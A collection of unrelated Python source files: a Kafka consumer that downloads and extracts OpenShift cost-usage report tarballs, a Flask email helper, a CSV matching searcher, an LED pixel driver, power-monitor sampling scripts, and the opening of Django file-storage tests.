schema_name: String,
provider_uuid: String
"""
account = None
provider_uuid = utils.get_provider_uuid_from_cluster_id(cluster_id)
if provider_uuid:
msg = f"Found provider_uuid: {str(provider_uuid)} for cluster_id: {str(cluster_id)}"
LOG.info(log_json(manifest_uuid, msg, context))
if context:
context["provider_uuid"] = provider_uuid
account = get_account(provider_uuid, manifest_uuid, context)
return account
def download_payload(request_id, url, context={}):
"""
Download the payload from ingress to temporary location.
Args:
request_id (String): Identifier associated with the payload
url (String): URL path to payload in the Insights upload service..
context (Dict): Context for logging (account, etc)
Returns:
Tuple: temp_dir (String), temp_file (String)
"""
# Create temporary directory for initial file staging and verification in the
# OpenShift PVC directory so that any failures can be triaged in the event
# the pod goes down.
os.makedirs(Config.PVC_DIR, exist_ok=True)
temp_dir = tempfile.mkdtemp(dir=Config.PVC_DIR)
# Download file from quarantine bucket as tar.gz
try:
download_response = requests.get(url)
download_response.raise_for_status()
except requests.exceptions.HTTPError as err:
shutil.rmtree(temp_dir)
msg = f"Unable to download file. Error: {str(err)}"
LOG.warning(log_json(request_id, msg))
raise KafkaMsgHandlerError(msg)
sanitized_request_id = re.sub("[^A-Za-z0-9]+", "", request_id)
gzip_filename = f"{sanitized_request_id}.tar.gz"
temp_file = f"{temp_dir}/{gzip_filename}"
try:
temp_file_hdl = open(temp_file, "wb")
temp_file_hdl.write(download_response.content)
temp_file_hdl.close()
except (OSError, IOError) as error:
shutil.rmtree(temp_dir)
msg = f"Unable to write file. Error: {str(error)}"
LOG.warning(log_json(request_id, msg, context))
raise KafkaMsgHandlerError(msg)
return (temp_dir, temp_file, gzip_filename)
def extract_payload_contents(request_id, out_dir, tarball_path, tarball, context={}):
"""
Extract the payload contents into a temporary location.
Args:
request_id (String): Identifier associated with the payload
out_dir (String): temporary directory to extract data to
tarball_path (String): the path to the payload file to extract
tarball (String): the payload file to extract
context (Dict): Context for logging (account, etc)
Returns:
(String): path to manifest file
"""
# Extract tarball into temp directory
if not os.path.isfile(tarball_path):
msg = f"Unable to find tar file {tarball_path}."
LOG.warning(log_json(request_id, msg, context))
raise KafkaMsgHandlerError("Extraction failure, file not found.")
try:
mytar = TarFile.open(tarball_path, mode="r:gz")
mytar.extractall(path=out_dir)
files = mytar.getnames()
manifest_path = [manifest for manifest in files if "manifest.json" in manifest]
except (ReadError, EOFError, OSError) as error:
msg = f"Unable to untar file {tarball_path}. Reason: {str(error)}"
LOG.warning(log_json(request_id, msg, context))
shutil.rmtree(out_dir)
raise KafkaMsgHandlerError("Extraction failure.")
if not manifest_path:
msg = "No manifest found in payload."
LOG.warning(log_json(request_id, msg, context))
raise KafkaMsgHandlerError("No manifest found in payload.")
return manifest_path
def construct_parquet_reports(request_id, context, report_meta, payload_destination_path, report_file):
"""Build, upload and convert parquet reports."""
daily_parquet_files = create_daily_archives(
request_id,
report_meta["account"],
report_meta["provider_uuid"],
report_file,
payload_destination_path,
report_meta["manifest_id"],
report_meta["date"],
context,
)
return daily_parquet_files
# pylint: disable=too-many-locals
def extract_payload(url, request_id, context={}): # noqa: C901
"""
Extract OCP usage report payload into local directory structure.
Payload is expected to be a .tar.gz file that contains:
1. manifest.json - dictionary containing usage report details needed
for report processing.
Dictionary Contains:
files - names of .csv usage reports for the manifest
date - DateTime that the payload was created
uuid - uuid for payload
cluster_id - OCP cluster ID.
2. *.csv - Actual usage report for the cluster. Format is:
Format is: <uuid>_report_name.csv
On successful completion the report and manifest will be in a directory
structure that the OCPReportDownloader is expecting.
Ex: /var/tmp/insights_local/my-ocp-cluster-1/20181001-20181101
Once the files are extracted:
1. Provider account is retrieved for the cluster id. If no account is found we return.
2. Manifest database record is created which will establish the assembly_id and number of files
3. Report stats database record is created and is used as a filter to determine if the file
has already been processed.
4. All report files that have not been processed will have the local path to that report file
added to the report_meta context dictionary for that file.
5. Report file context dictionaries that require processing is added to a list which will be
passed to the report processor. All context from report_meta is used by the processor.
Args:
url (String): URL path to payload in the Insights upload service..
request_id (String): Identifier associated with the payload
context (Dict): Context for logging (account, etc)
Returns:
[dict]: keys: value
files: [String],
date: DateTime,
cluster_id: String
manifest_path: String,
provider_uuid: String,
provider_type: String
schema_name: String
manifest_id: Integer
current_file: String
"""
temp_dir, temp_file_path, temp_file = download_payload(request_id, url, context)
manifest_path = extract_payload_contents(request_id, temp_dir, temp_file_path, temp_file, context)
# Open manifest.json file and build the payload dictionary.
full_manifest_path = f"{temp_dir}/{manifest_path[0]}"
report_meta = utils.get_report_details(os.path.dirname(full_manifest_path))
# Filter and get account from payload's cluster-id
cluster_id = report_meta.get("cluster_id")
manifest_uuid = report_meta.get("uuid", request_id)
LOG.info(
log_json(
request_id,
f"Payload with the request id {request_id} from cluster {cluster_id}"
+ f"is part of the report with manifest id {manifest_uuid}",
)
)
if context:
context["cluster_id"] = cluster_id
account = get_account_from_cluster_id(cluster_id, manifest_uuid, context)
if not account:
msg = f"Recieved unexpected OCP report from {cluster_id}"
LOG.warning(log_json(manifest_uuid, msg, context))
shutil.rmtree(temp_dir)
return None, manifest_uuid
schema_name = account.get("schema_name")
provider_type = account.get("provider_type")
context["account"] = schema_name[4:]
context["provider_type"] = provider_type
report_meta["provider_uuid"] = account.get("provider_uuid")
report_meta["provider_type"] = provider_type
report_meta["schema_name"] = schema_name
report_meta["account"] = schema_name[4:]
report_meta["request_id"] = request_id
report_meta["tracing_id"] = manifest_uuid
# Create directory tree for report.
usage_month = utils.month_date_range(report_meta.get("date"))
destination_dir = f"{Config.INSIGHTS_LOCAL_REPORT_DIR}/{report_meta.get('cluster_id')}/{usage_month}"
os.makedirs(destination_dir, exist_ok=True)
# Copy manifest
manifest_destination_path = f"{destination_dir}/{os.path.basename(report_meta.get('manifest_path'))}"
shutil.copy(report_meta.get("manifest_path"), manifest_destination_path)
# Save Manifest
report_meta["manifest_id"] = create_manifest_entries(report_meta, request_id, context)
# Copy report payload
report_metas = []
for report_file in report_meta.get("files"):
current_meta = report_meta.copy()
subdirectory = os.path.dirname(full_manifest_path)
payload_source_path = f"{subdirectory}/{report_file}"
payload_destination_path = f"{destination_dir}/{report_file}"
try:
shutil.copy(payload_source_path, payload_destination_path)
current_meta["current_file"] = payload_destination_path
record_all_manifest_files(report_meta["manifest_id"], report_meta.get("files"), manifest_uuid)
if not record_report_status(report_meta["manifest_id"], report_file, manifest_uuid, context):
msg = f"Successfully extracted OCP for {report_meta.get('cluster_id')}/{usage_month}"
LOG.info(log_json(manifest_uuid, msg, context))
construct_parquet_reports(request_id, context, report_meta, payload_destination_path, report_file)
report_metas.append(current_meta)
else:
# Report already processed
pass
except FileNotFoundError:
msg = f"File {str(report_file)} has not downloaded yet."
LOG.debug(log_json(manifest_uuid, msg, context))
# Remove temporary directory and files
shutil.rmtree(temp_dir)
return report_metas, manifest_uuid
@KAFKA_CONNECTION_ERRORS_COUNTER.count_exceptions()
def send_confirmation(request_id, status): # pragma: no cover
"""
Send kafka validation message to Insights Upload service.
When a new file lands for topic 'hccm' we must validate it
so that it will be made permanently available to other
apps listening on the 'platform.upload.available' topic.
Args:
request_id (String): Request ID for file being confirmed.
status (String): Either 'success' or 'failure'
Returns:
None
"""
producer = get_producer()
validation = {"request_id": request_id, "validation": status}
msg = bytes(json.dumps(validation), "utf-8")
producer.produce(Config.VALIDATION_TOPIC, value=msg, callback=delivery_callback)
# Wait up to 1 second for events. Callbacks will be invoked during
# this method call if the message is acknowledged.
# `flush` makes this process synchronous compared to async with `poll`
producer.flush(1)
def handle_message(msg):
"""
Handle messages from message pending queue.
Handle's messages with topics: 'platform.upload.hccm',
and 'platform.upload.available'.
The OCP cost usage payload will land on topic hccm.
These messages will be extracted into the local report
directory structure. Once the file has been verified
(successfully extracted) we will report the status to
the Insights Upload Service so the file can be made available
to other apps on the service.
Messages on the available topic are messages that have
been verified by an app on the Insights upload service.
For now we are just logging the URL for demonstration purposes.
In the future if we want to maintain a URL to our report files
in the upload service we could look for hashes for files that
we have previously validated on the hccm topic.
Args:
msg - Upload Service message containing usage payload information.
Returns:
(String, [dict]) - String: Upload Service confirmation status
[dict]: keys: value
files: [String],
date: DateTime,
cluster_id: String
manifest_path: String,
provider_uuid: String,
provider_type: String
schema_name: String
manifest_id: Integer
current_file: String
"""
if msg.topic() == Config.HCCM_TOPIC:
value = json.loads(msg.value().decode("utf-8"))
request_id = value.get("request_id", "no_request_id")
account = value.get("account", "no_account")
context = {"account": account}
try:
msg = f"Extracting Payload for msg: {str(value)}"
LOG.info(log_json(request_id, msg, context))
report_metas, manifest_uuid = extract_payload(value["url"], request_id, context)
return SUCCESS_CONFIRM_STATUS, report_metas, manifest_uuid
except (OperationalError, InterfaceError) as error:
close_and_set_db_connection()
msg = f"Unable to extract payload, db closed. {type(error).__name__}: {error}"
LOG.error(log_json(request_id, msg, context))
raise KafkaMsgHandlerError(msg)
except Exception as error: # noqa
traceback.print_exc()
msg = f"Unable to extract payload. Error: {type(error).__name__}: {error}"
LOG.warning(log_json(request_id, msg, context))
return FAILURE_CONFIRM_STATUS, None, None
else:
LOG.error("Unexpected Message")
return None, None, None
def get_account(provider_uuid, manifest_uuid, context={}):
"""
Retrieve a provider's account configuration needed for processing.
Args:
provider_uuid (String): Provider unique identifier.
manifest_uuid (String): Identifier associated with the payload manifest
context (Dict): Context for logging (account, etc)
Returns:
(dict) - keys: value
authentication: String,
customer_name: String,
billing_source: String,
provider_type: String,
schema_name: String,
provider_uuid: String
"""
all_accounts = []
try:
all_accounts = AccountsAccessor().get_accounts(provider_uuid)
except AccountsAccessorError as error:
msg = f"Unable to get accounts. Error: {str(error)}"
LOG.warning(log_json(manifest_uuid, msg, context))
return None
return all_accounts.pop() if all_accounts else None
def summarize_manifest(report_meta, manifest_uuid):
"""
Kick off manifest summary when all report files have completed line item processing.
Args:
manifest_uuid (string) - The id associated with the payload manifest
report (Dict) - keys: value
schema_name: String,
manifest_id: Integer,
provider_uuid: String,
provider_type: String,
Returns:
Celery Async UUID.
"""
async_id = None
schema_name = report_meta.get("schema_name")
manifest_id = report_meta.get("manifest_id")
provider_uuid = report_meta.get("provider_uuid")
schema_name = report_meta.get("schema_name")
provider_type = report_meta.get("provider_type")
start_date = report_meta.get("start")
end_date = report_meta.get("end")
with ReportManifestDBAccessor() as manifest_accesor:
if manifest_accesor.manifest_ready_for_summary(manifest_id):
report_meta = {
"schema_name": schema_name,
"provider_type": provider_type,
"provider_uuid": provider_uuid,
"manifest_id": manifest_id,
}
if start_date and end_date:
LOG.info(
log_json(
manifest_uuid,
f"Summarizing OCP reports from {str(start_date)}-{str(end_date)} for provider: {provider_uuid}",
)
)
report_meta["start"] = start_date
report_meta["end"] = end_date
report_meta["manifest_uuid"] = manifest_uuid
async_id = summarize_reports.s([report_meta], OCP_QUEUE).apply_async(queue=OCP_QUEUE)
return async_id
def process_report(request_id, report):
"""
Process line item report.
Returns True when line item processing is complete. This is important because
the listen_for_messages -> process_messages path must have a positive acknowledgement
that line item processing is complete before committing.
If the service goes down in the middle of processing (SIGTERM) we do not want a
stray kafka commit to prematurely commit the message before processing has been
complete.
Args:
request_id (Str): The request id
report (Dict) - keys: value
request_id: String,
account: String,
schema_name: String,
manifest_id: Integer,
provider_uuid: String,
provider_type: String,
current_file: String,
date: DateTime
Returns:
True if line item report processing is complete.
"""
schema_name = report.get("schema_name")
manifest_id = report.get("manifest_id")
provider_uuid = str(report.get("provider_uuid"))
provider_type = report.get("provider_type")
date = report.get("date")
# The create_table flag is used by the ParquetReportProcessor
# to create a Hive/Trino table.
report_dict = {
"file": report.get("current_file"),
"compression": UNCOMPRESSED,
"manifest_id": manifest_id,
"provider_uuid": provider_uuid,
"request_id": request_id,
"tracing_id": report.get("tracing_id"),
"provider_type": "OCP",
"start_date": date,
"create_table": True,
}
try:
return _process_report_file(schema_name, provider_type, report_dict)
except NotImplementedError as err:
LOG.info(f"NotImplementedError: {str(err)}")
return True
def report_metas_complete(report_metas):
"""
Verify if all reports from the ingress payload have been processed.
in process_messages, a dictionary value "process_complete" is added to the
report metadata dictionary for a report file. This must be True for it to be
considered processed.
Args:
report_metas (list) - List of report metadata dictionaries needed for line item
processing.
Returns:
True if all report files for the payload have completed line item processing.
"""
process_complete = False
for report_meta in report_metas:
if not report_meta.get("process_complete"):
process_complete = False
break
else:
process_complete = True
return process_complete
def process_messages(msg):
"""
Process messages and send validation status.
Processing involves:
1. Downloading, verifying, extracting, and preparing report files for processing.
2. Line item processing each report file in the payload (downloaded from step 1).
3. Check if all reports have been processed for the manifest and if so, kick off
the celery worker task to summarize.
4. Send payload validation status to ingress service.
Args:
msg (ConsumerRecord) - Message from kafka hccm topic.
Returns:
None
"""
process_complete = False
status, report_metas, manifest_uuid = handle_message(msg)
value = json.loads(msg.value().decode("utf-8"))
request_id = value.get("request_id", "no_request_id")
tracing_id = manifest_uuid or request_id
if report_metas:
for report_meta in report_metas:
report_meta["process_complete"] = process_report(request_id, report_meta)
LOG.info(log_json(tracing_id, f"Processing: {report_meta.get('current_file')} complete."))
process_complete = report_metas_complete(report_metas)
summary_task_id = summarize_manifest(report_meta, tracing_id)
if summary_task_id:
LOG.info(log_json(tracing_id, f"Summarization celery uuid: {summary_task_id}"))
if status:
if report_metas:
file_list = [meta.get("current_file") for meta in report_metas]
files_string = ",".join(map(str, file_list))
LOG.info(log_json(tracing_id, f"Sending Ingress Service confirmation for: {files_string}"))
else:
LOG.info(log_json(tracing_id, f"Sending Ingress Service confirmation for: {value}"))
send_confirmation(value["request_id"], status)
return process_complete
def get_consumer(): # pragma: no cover
"""Create a Kafka consumer."""
consumer = Consumer(
{
"bootstrap.servers": Config.INSIGHTS_KAFKA_ADDRESS,
"group.id": "hccm-group",
"queued.max.messages.kbytes": 1024,
"enable.auto.commit": False,
"max.poll.interval.ms": 1080000, # 18 minutes
},
logger=LOG,
)
consumer.subscribe([Config.HCCM_TOPIC])
return consumer
def get_producer(): # pragma: no cover
"""Create a Kafka producer."""
producer = Producer({"bootstrap.servers": Config.INSIGHTS_KAFKA_ADDRESS, "message.timeout.ms": 1000})
return producer
def listen_for_messages_loop():
"""Wrap listen_for_messages in while true."""
consumer = get_consumer()
LOG.info("Consumer is listening for messages...")
for _ in itertools.count(): # equivalent to while True, but mockable
msg = consumer.poll(timeout=1.0)
if msg is None:
continue
if msg.error():
KAFKA_CONNECTION_ERRORS_COUNTER.inc()
LOG.error(f"[listen_for_messages_loop] consumer.poll message: {msg}. Error: {msg.error()}")
continue
listen_for_messages(msg, consumer)
def rewind_consumer_to_retry(consumer, topic_partition):
"""Helper method to log and rewind kafka consumer for retry."""
LOG.info(f"Seeking back to offset: {topic_partition.offset}, partition: {topic_partition.partition}")
consumer.seek(topic_partition)
time.sleep(Config.RETRY_SECONDS)
def listen_for_messages(msg, consumer):
"""
Listen for messages on the hccm topic.
Once a message from one of these topics arrives, we add
them extract the payload and line item process the report files.
Once all files from the manifest are complete a celery job is
dispatched to the worker to complete summary processing for the manifest.
Several exceptions can occur while listening for messages:
Database Errors - Re-processing attempts will be made until successful.
Internal Errors - Re-processing attempts will be made until successful.
Report Processing Errors - Kafka message will be committed with an error.
Errors of this type would require a report processor
fix and we do not want to block the message queue.
Upon successful processing the kafka message is manually committed. Manual
commits are used so we can use the message queue to store unprocessed messages
to make the service more tolerant of SIGTERM events.
Args:
consumer - (Consumer): kafka consumer for HCCM ingress topic.
Returns:
None
"""
offset = msg.offset()
partition = msg.partition()
topic_partition = TopicPartition(topic=Config.HCCM_TOPIC, partition=partition, offset=offset)
try:
LOG.info(f"Processing message offset: {offset} partition: {partition}")
process_messages(msg)
LOG.debug(f"COMMITTING: message offset: {offset} partition: {partition}")
consumer.commit()
except (InterfaceError, OperationalError, ReportProcessorDBError) as error:
close_and_set_db_connection()
LOG.error(f"[listen_for_messages] Database error. Error: {type(error).__name__}: {error}. Retrying...")
rewind_consumer_to_retry(consumer, topic_partition)
except (KafkaMsgHandlerError, RabbitOperationalError) as error:
LOG.error(f"[listen_for_messages] Internal error. {type(error).__name__}: {error}. Retrying...")
rewind_consumer_to_retry(consumer, topic_partition)
except ReportProcessorError as error:
LOG.error(f"[listen_for_messages] Report processing error: {str(error)}")
LOG.debug(f"COMMITTING: message offset: {offset} partition: {partition}")
consumer.commit()
except Exception as error:
LOG.error(f"[listen_for_messages] UNKNOWN error encountered: {type(error).__name__}: {error}", exc_info=True)
def koku_listener_thread(): # pragma: no cover
"""
Configure Listener listener thread.
Returns:
None
"""
if is_kafka_connected(Config.INSIGHTS_KAFKA_HOST, Config.INSIGHTS_KAFKA_PORT): # Check that Kafka is running
LOG.info("Kafka is running.")
try:
listen_for_messages_loop()
except KeyboardInterrupt:
exit(0)
def initialize_kafka_handler(): # pragma: no cover
"""
Start Listener thread.
Args:
None
Returns:
None
"""
if Config.KAFKA_CONNECT:
event_loop_thread = threading.Thread(target=koku_listener_thread)
event_loop_thread.daemon = True
event_loop_thread.start()
event_loop_thread.join()
|
email.py | from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
print(app.config['FLASKY_MAIL_SENDER'], "dhhdhdhdhhdhdhdhdhhdhd", app.config['FLASKY_MAIL_SUBJECT_PREFIX'])
msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
|
searcher.py | import os
import logging
from unicodecsv import writer
from collections import OrderedDict
from collections import defaultdict
from Queue import Queue
from threading import RLock, Thread
from pprint import pprint # noqa
import multiprocessing
from tabref.util import normalize_value, decode_path
log = logging.getLogger(__name__)
class TableSearcher(object):
def __init__(self, matcher, out_dir, base_name):
self.matcher = matcher
self.out_dir = decode_path(out_dir)
self.base_name = base_name
self.queue = Queue(maxsize=50000)
self.match_count = 0
self.lock = RLock()
try:
os.makedirs(self.out_dir)
except:
pass
self.result_writer = None
def write_result(self, result):
self.lock.acquire()
try:
if self.result_writer is None:
self.headers = result.keys()
result_path = '%s.csv' % self.base_name
result_path = decode_path(result_path)
result_path = os.path.join(self.out_dir, result_path)
self.result_fh = open(result_path, 'w')
self.result_writer = writer(self.result_fh)
self.result_writer.writerow(self.headers)
self.result_writer.writerow([result.get(h) for h in self.headers])
finally:
self.lock.release()
def finalize(self):
self.lock.acquire()
try:
if self.result_writer is not None:
self.result_fh.close()
finally:
self.lock.release()
def match_row(self, row):
matches = defaultdict(list)
for key, text in row.items():
norm = normalize_value(text)
if norm is None:
continue
for (_, match) in self.matcher.iter(norm):
matches[match].append(key)
for match, fields in matches.items():
result = OrderedDict(row.items())
result['_match_name'] = match
result['_match_field'] = ', '.join(fields)
# pprint(dict(result))
self.write_result(result)
self.match_count += 1
def handle_row(self):
while True:
item = self.queue.get()
self.match_row(item)
self.queue.task_done()
def process(self):
num_threads = multiprocessing.cpu_count()
log.info("Process [%s threads]: %s", num_threads, self.base_name)
for i in range(num_threads):
thread = Thread(target=self.handle_row)
thread.daemon = True
thread.start()
for count, row in enumerate(self.rows()):
self.queue.put(row)
# self.match_row(row)
if count % 10000 == 0 and count > 0:
log.info("[%s] done: %s rows, %s matches, %d queued",
self.base_name, count, self.match_count,
self.queue.qsize())
self.queue.join()
self.finalize()
|
pixels.py |
import apa102
import time
import threading
from gpiozero import LED
try:
import queue as Queue
except ImportError:
import Queue as Queue
from alexa_led_pattern import AlexaLedPattern
from google_home_led_pattern import GoogleHomeLedPattern
class Pixels:
PIXELS_N = 12
def __init__(self, pattern=GoogleHomeLedPattern):
self.pattern = pattern(show=self.show)
self.dev = apa102.APA102(num_led=self.PIXELS_N)
self.power = LED(5)
self.power.on()
self.queue = Queue.Queue()
self.thread = threading.Thread(target=self._run)
self.thread.daemon = True
self.thread.start()
self.last_direction = None
def wakeup(self, direction=0):
#print("Pixels WAKEUP")
self.last_direction = direction
self.pattern.wakeup(direction)
def listen(self):
#print("Pixels LISTEN")
if self.last_direction:
def f():
self.pattern.wakeup(self.last_direction)
self.put(f)
else:
self.put(self.pattern.listen)
def think(self):
#print("Pixels THINK")
self.put(self.pattern.think)
def speak(self):
#print("Pixels SPEAK")
self.put(self.pattern.speak)
def off(self):
#print("Pixels OFF")
self.put(self.pattern.off)
time.sleep(.5)
#print("Pixels OFF")
self.put(self.pattern.off)
def put(self, func):
self.pattern.stop = True
self.queue.put(func)
def _run(self):
while True:
func = self.queue.get()
self.pattern.stop = False
func()
def show(self, data):
for i in range(self.PIXELS_N):
self.dev.set_pixel(i, int(data[4*i + 1]), int(data[4*i + 2]), int(data[4*i + 3]))
self.dev.show()
pixels = Pixels()
if __name__ == '__main__':
while True:
try:
pixels.wakeup()
time.sleep(3)
pixels.think()
time.sleep(3)
pixels.speak()
time.sleep(6)
pixels.off()
time.sleep(3)
except KeyboardInterrupt:
break
pixels.off()
time.sleep(1)
|
Main.py | from multiprocessing import Process
import LVPM
import sampleEngine
import Operations as op
import HVPM
import pmapi
def testHVPM(serialno=None,Protocol=pmapi.USB_protocol()):
HVMON = HVPM.Monsoon()
HVMON.setup_usb(serialno,Protocol)
print("HVPM Serial Number: " + repr(HVMON.getSerialNumber()))
HVMON.fillStatusPacket()
HVMON.setVout(3)
HVengine = sampleEngine.SampleEngine(HVMON)
HVengine.enableCSVOutput("HV Main Example.csv")
HVengine.ConsoleOutput(True)
numSamples=sampleEngine.triggers.SAMPLECOUNT_INFINITE #Don't stop based on sample count, continue until the trigger conditions have been satisfied.
HVengine.setStartTrigger(sampleEngine.triggers.GREATER_THAN,0) #Start when we exceed 0 s
HVengine.setStopTrigger(sampleEngine.triggers.GREATER_THAN,20) #Stop when we exceed 5 s.
HVengine.setTriggerChannel(sampleEngine.channels.timeStamp) #Start and stop judged by the timestamp channel.
HVengine.startSampling(numSamples)
HVMON.closeDevice();
def testLVPM(serialno=None,Protcol=pmapi.USB_protocol()):
Mon = LVPM.Monsoon()
Mon.setup_usb(serialno,Protcol)
print("LVPM Serial number: " + repr(Mon.getSerialNumber()))
Mon.fillStatusPacket()
Mon.setVout(4.5)
engine = sampleEngine.SampleEngine(Mon)
engine.enableCSVOutput("Main Example.csv")
engine.ConsoleOutput(True)
#test main channels
numSamples=sampleEngine.triggers.SAMPLECOUNT_INFINITE #Don't stop based on sample count, continue until the trigger conditions have been satisfied.
engine.setStartTrigger(sampleEngine.triggers.GREATER_THAN,0) #Start when we exceed 0 s
engine.setStopTrigger(sampleEngine.triggers.GREATER_THAN,5) #Stop when we exceed 5 s.
engine.setTriggerChannel(sampleEngine.channels.timeStamp) #Start and stop judged by the timestamp channel.
engine.startSampling(numSamples)
#Disable Main channels
engine.disableChannel(sampleEngine.channels.MainCurrent)
engine.disableChannel(sampleEngine.channels.MainVoltage)
engine.setStartTrigger(sampleEngine.triggers.GREATER_THAN,0)
engine.setStopTrigger(sampleEngine.triggers.GREATER_THAN,10)
engine.setTriggerChannel(sampleEngine.channels.timeStamp)
#Take measurements from the USB Channel
Mon.setVout(0)
#Set USB Passthrough mode to 'on,' since it defaults to 'auto' and will turn off when sampling mode begins.
Mon.setUSBPassthroughMode(op.USB_Passthrough.On)
#Enable USB channels
engine.enableChannel(sampleEngine.channels.USBCurrent)
engine.enableChannel(sampleEngine.channels.USBVoltage)
engine.enableCSVOutput("USB Test.csv")
engine.startSampling(5000)
#Enable every channel, take measurements
engine.enableChannel(sampleEngine.channels.MainVoltage)
engine.enableChannel(sampleEngine.channels.MainCurrent)
#Enable Aux channel
engine.enableChannel(sampleEngine.channels.AuxCurrent)
Mon.setVout(2.5)
engine.enableCSVOutput("All Test.csv")
engine.startSampling(5000)
#Enable every channel, take measurements, and retrieve them as a Python list.
engine.disableCSVOutput()
engine.startSampling(5000)
samples = engine.getSamples()
Mon.closeDevice();
def droppedSamplesTest(ser=None,Prot=pmapi.USB_protocol()):
Mon = HVPM.Monsoon()
Mon.setup_usb(ser,Prot)
Mon.setVout(4.0)
engine = sampleEngine.SampleEngine(Mon)
#engine.enableCSVOutput(repr(ser) + ".csv")
engine.ConsoleOutput(False)
# test main channels
engine.enableChannel(sampleEngine.channels.MainCurrent)
numSamples = 1000000 # Don't stop based on sample count, continue until the trigger conditions have been satisfied.
engine.setTriggerChannel(sampleEngine.channels.timeStamp) # Start and stop judged by the timestamp channel.
engine.startSampling(numSamples)
samps = engine.getSamples()
sampleCount = len(samps[0])
print(repr(ser) + ": SampleCount: " + repr(sampleCount) + " Percent dropped: " + repr((engine.dropped/sampleCount)*100))
def multiHVPMTest(serialnos):
for serial in serialnos:
p = Process(target=droppedSamplesTest,args=(serial,pmapi.CPP_Backend_Protocol()))
p.start()
serialnos = [11500, 20019, 20486, 20487]
multiHVPMTest(serialnos)
#testLVPM(60001,pmapi.USB_protocol())
#testHVPM(60000,pmapi.CPP_Backend_Protocol())
testHVPM()
|
tests.py | import os
import shutil
import sys
import tempfile
import threading
import time
import unittest
from datetime import datetime, timedelta
from io import StringIO
from pathlib import Path
from urllib.request import urlopen
from django.core.cache import cache
from django.core.exceptions import SuspiciousFileOperation
from django.core.files.base import ContentFile, File
from django.core.files.storage import (
FileSystemStorage, Storage as BaseStorage, default_storage,
get_storage_class,
)
from django.core.files.uploadedfile import (
InMemoryUploadedFile, SimpleUploadedFile, TemporaryUploadedFile,
)
from django.db.models import FileField
from django.db.models.fields.files import FileDescriptor
from django.test import (
LiveServerTestCase, SimpleTestCase, TestCase, override_settings,
)
from django.test.utils import requires_tz_support
from django.urls import NoReverseMatch, reverse_lazy
from django.utils import timezone
from django.utils._os import symlinks_supported
from .models import (
Storage, callable_storage, temp_storage, temp_storage_location,
)
FILE_SUFFIX_REGEX = '[A-Za-z0-9]{7}'
class GetStorageClassTests(SimpleTestCase):
def test_get_filesystem_storage(self):
"""
get_storage_class returns the class for a storage backend name/path.
"""
self.assertEqual(
get_storage_class('django.core.files.storage.FileSystemStorage'),
FileSystemStorage)
def test_get_invalid_storage_module(self):
"""
get_storage_class raises an error if the requested import don't exist.
"""
with self.assertRaisesMessage(ImportError, "No module named 'storage'"):
get_storage_class('storage.NonexistentStorage')
def test_get_nonexistent_storage_class(self):
"""
get_storage_class raises an error if the requested class don't exist.
"""
with self.assertRaises(ImportError):
get_storage_class('django.core.files.storage.NonexistentStorage')
def test_get_nonexistent_storage_module(self):
"""
get_storage_class raises an error if the requested module don't exist.
"""
with self.assertRaisesMessage(ImportError, "No module named 'django.core.files.nonexistent_storage'"):
get_storage_class('django.core.files.nonexistent_storage.NonexistentStorage')
class FileSystemStorageTests(unittest.TestCase):
def test_deconstruction(self):
path, args, kwargs = temp_storage.deconstruct()
self.assertEqual(path, "django.core.files.storage.FileSystemStorage")
self.assertEqual(args, ())
self.assertEqual(kwargs, {'location': temp_storage_location})
kwargs_orig = {
'location': temp_storage_location,
'base_url': 'http://myfiles.example.com/'
}
storage = FileSystemStorage(**kwargs_orig)
path, args, kwargs = storage.deconstruct()
self.assertEqual(kwargs, kwargs_orig)
def test_lazy_base_url_init(self):
"""
FileSystemStorage.__init__() shouldn't evaluate base_url.
"""
storage = FileSystemStorage(base_url=reverse_lazy('app:url'))
with self.assertRaises(NoReverseMatch):
storage.url(storage.base_url)
class FileStorageTests(SimpleTestCase):
storage_class = FileSystemStorage
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = self.storage_class(location=self.temp_dir, base_url='/test_media_url/')
# Set up a second temporary directory which is ensured to have a mixed
# case name.
self.temp_dir2 = tempfile.mkdtemp(suffix='aBc')
def tearDown(self):
shutil.rmtree(self.temp_dir)
shutil.rmtree(self.temp_dir2)
def test_empty_location(self):
"""
Makes sure an exception is raised if the location is empty
"""
storage = self.storage_class(location='')
self.assertEqual(storage.base_location, '')
self.assertEqual(storage.location, os.getcwd())
def test_file_access_options(self):
"""
Standard file access options are available, and work as expected.
"""
self.assertFalse(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'w')
f.write('storage contents')
f.close()
self.assertTrue(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'r')
self.assertEqual(f.read(), 'storage contents')
f.close()
self.storage.delete('storage_test')
self.assertFalse(self.storage.exists('storage_test'))
def _test_file_time_getter(self, getter):
# Check for correct behavior under both USE_TZ=True and USE_TZ=False.
# The tests are similar since they both set up a situation where the
# system time zone, Django's TIME_ZONE, and UTC are distinct.
self._test_file_time_getter_tz_handling_on(getter)
self._test_file_time_getter_tz_handling_off(getter)
@override_settings(USE_TZ=True, TIME_ZONE='Africa/Algiers')
def _test_file_time_getter_tz_handling_on(self, getter):
# Django's TZ (and hence the system TZ) is set to Africa/Algiers which
# is UTC+1 and has no DST change. We can set the Django TZ to something
# else so that UTC, Django's TIME_ZONE, and the system timezone are all
# different.
now_in_algiers = timezone.make_aware(datetime.now())
with timezone.override(timezone.get_fixed_timezone(-300)):
# At this point the system TZ is +1 and the Django TZ
# is -5. The following will be aware in UTC.
now = timezone.now()
self.assertFalse(self.storage.exists('test.file.tz.on'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file.tz.on', f)
self.addCleanup(self.storage.delete, f_name)
dt = getter(f_name)
# dt should be aware, in UTC
self.assertTrue(timezone.is_aware(dt))
self.assertEqual(now.tzname(), dt.tzname())
# The three timezones are indeed distinct.
naive_now = datetime.now()
algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
django_offset = timezone.get_current_timezone().utcoffset(naive_now)
utc_offset = timezone.utc.utcoffset(naive_now)
self.assertGreater(algiers_offset, utc_offset)
self.assertLess(django_offset, utc_offset)
# dt and now should be the same effective time.
